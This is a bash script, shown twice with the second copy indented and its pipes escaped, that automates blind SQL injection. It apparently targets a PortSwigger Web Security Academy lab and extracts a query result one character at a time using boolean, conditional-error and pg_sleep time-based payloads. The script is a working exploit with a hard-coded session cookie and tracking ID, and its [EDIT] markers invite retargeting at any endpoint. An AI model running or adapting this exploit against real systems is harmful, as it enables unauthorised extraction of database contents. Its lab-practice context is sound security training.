p4p1/blind_sql.sh

## blind_sql.sh
#!/bin/bash
# blind_sql.sh
# Created on: Sun 17 Oct 2021 02:35:42 AM BST
#
#  ____   __  ____  __
# (  _ \ /. |(  _ \/  )
#  )___/(_  _))___/ )(
# (__)    (_)(__)  (__)
#
# Description:
#  This tool is used to test for blind SQL Injections to exploit this
#  we will look for differences inside of the response and if there is
#  we will know if we matched a correct pattern. There will be an [EDIT]
#  tag on the areas where a user needs to change the data supplied by the
#  script to aid in exploitation.
# Note:
#  $query -> stands for the query
#  $j -> stands for the position of the character in the string
#  $i -> is the character currently beeing tested
# Payloads:
# https://portswigger.net/web-security/sql-injection/cheat-sheet
#  - ' AND substring(($query),$j,1)='$i
#  - ' AND (SELECT CASE WHEN (SUBSTR(($query),$j,1)='$i') THEN to_char(1/0) ELSE 'a' END FROM dual)='a
#  - '%3b SELECT CASE WHEN (substring(($query),$j,1)='$i') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM $db_name--

charset=$(echo {0..9} {A..z} \. \: \, \; \- \_ \@)

URL="https://0ade00b10430eecf807cf9fe00590036.web-security-academy.net" # [EDIT] change with correct endpoint
truestring="Giant Pillow Thing" # [EDIT] change with the string on true statements
maxlength=30 # [EDIT] change with length of result
result=""
query="SELECT @@version" # [EDIT] change with the query needed
cut_it_off=1


echo -n "Found: "
for ((j = 1; j < $maxlength; j+=1)); do
	for i in $charset; do
		cut_it_off=1
		echo -n "$i"
		# [EDIT] this section can be edited bellow to have a curl request addapted
		# to the website you are testing. Referance to the payload setion in header of
		# this file for payload sample.
		curl "$URL" -X GET -d "session=CZ384lrLWnrJrJm7uqkiB8PLKlgpNv4D; TrackingId=v7aOHBncsO6lUJym' AND substring(($query),$j,1)='$i" -s | grep "$truestring" &> /dev/null

		# Time base sql injection section
		#time=$(/usr/bin/time -f "%e" curl "$URL"  -H "Cookie: TrackingId=abc'%3b SELECT CASE WHEN (substring(($query),$j,1)='$i') THEN pg_sleep(10) ELSE pg_sleep(0) END --" -s -o /dev/null 2>&1 | cut -d"." -f1)
		#if [ $time -ge 10 ]; then

		# Conditional error
		#curl "$URL" -X GET -d "session=CZ384lrLWnrJrJm7uqkiB8PLKlgpNv4D; TrackingId=v7aOHBncsO6lUJym' AND substring(($query),$j,1)='$i" -s | grep "$truestring" &> /dev/null

		if [ "$?" == "0" ]; then # Comment this to switch to time based
			result="${result}${i}"
			cut_it_off=0
			break
		else
			echo -ne "\b \b"
		fi
	done
	if [ $cut_it_off -eq 1 ];then
		break
	fi
done
echo

exit
	#!/bin/bash
	# blind_sql.sh
	# Created on: Sun 17 Oct 2021 02:35:42 AM BST
	#
	# ____ __ ____ __
	# ( _ \ /. \|( _ \/ )
	# )___/(_ _))___/ )(
	# (__) (_)(__) (__)
	#
	# Description:
	# This tool is used to test for blind SQL Injections to exploit this
	# we will look for differences inside of the response and if there is
	# we will know if we matched a correct pattern. There will be an [EDIT]
	# tag on the areas where a user needs to change the data supplied by the
	# script to aid in exploitation.
	# Note:
	# $query -> stands for the query
	# $j -> stands for the position of the character in the string
	# $i -> is the character currently beeing tested
	# Payloads:
	# https://portswigger.net/web-security/sql-injection/cheat-sheet
	# - ' AND substring(($query),$j,1)='$i
	# - ' AND (SELECT CASE WHEN (SUBSTR(($query),$j,1)='$i') THEN to_char(1/0) ELSE 'a' END FROM dual)='a
	# - '%3b SELECT CASE WHEN (substring(($query),$j,1)='$i') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM $db_name--

	charset=$(echo {0..9} {A..z} \. \: \, \; \- \_ \@)

	URL="https://0ade00b10430eecf807cf9fe00590036.web-security-academy.net" # [EDIT] change with correct endpoint
	truestring="Giant Pillow Thing" # [EDIT] change with the string on true statements
	maxlength=30 # [EDIT] change with length of result
	result=""
	query="SELECT @@version" # [EDIT] change with the query needed
	cut_it_off=1


	echo -n "Found: "
	for ((j = 1; j < $maxlength; j+=1)); do
	for i in $charset; do
	cut_it_off=1
	echo -n "$i"
	# [EDIT] this section can be edited bellow to have a curl request addapted
	# to the website you are testing. Referance to the payload setion in header of
	# this file for payload sample.
	curl "$URL" -X GET -d "session=CZ384lrLWnrJrJm7uqkiB8PLKlgpNv4D; TrackingId=v7aOHBncsO6lUJym' AND substring(($query),$j,1)='$i" -s \| grep "$truestring" &> /dev/null

	# Time base sql injection section
	#time=$(/usr/bin/time -f "%e" curl "$URL" -H "Cookie: TrackingId=abc'%3b SELECT CASE WHEN (substring(($query),$j,1)='$i') THEN pg_sleep(10) ELSE pg_sleep(0) END --" -s -o /dev/null 2>&1 \| cut -d"." -f1)
	#if [ $time -ge 10 ]; then

	# Conditional error
	#curl "$URL" -X GET -d "session=CZ384lrLWnrJrJm7uqkiB8PLKlgpNv4D; TrackingId=v7aOHBncsO6lUJym' AND substring(($query),$j,1)='$i" -s \| grep "$truestring" &> /dev/null

	if [ "$?" == "0" ]; then # Comment this to switch to time based
	result="${result}${i}"
	cut_it_off=0
	break
	else
	echo -ne "\b \b"
	fi
	done
	if [ $cut_it_off -eq 1 ];then
	break
	fi
	done
	echo

	exit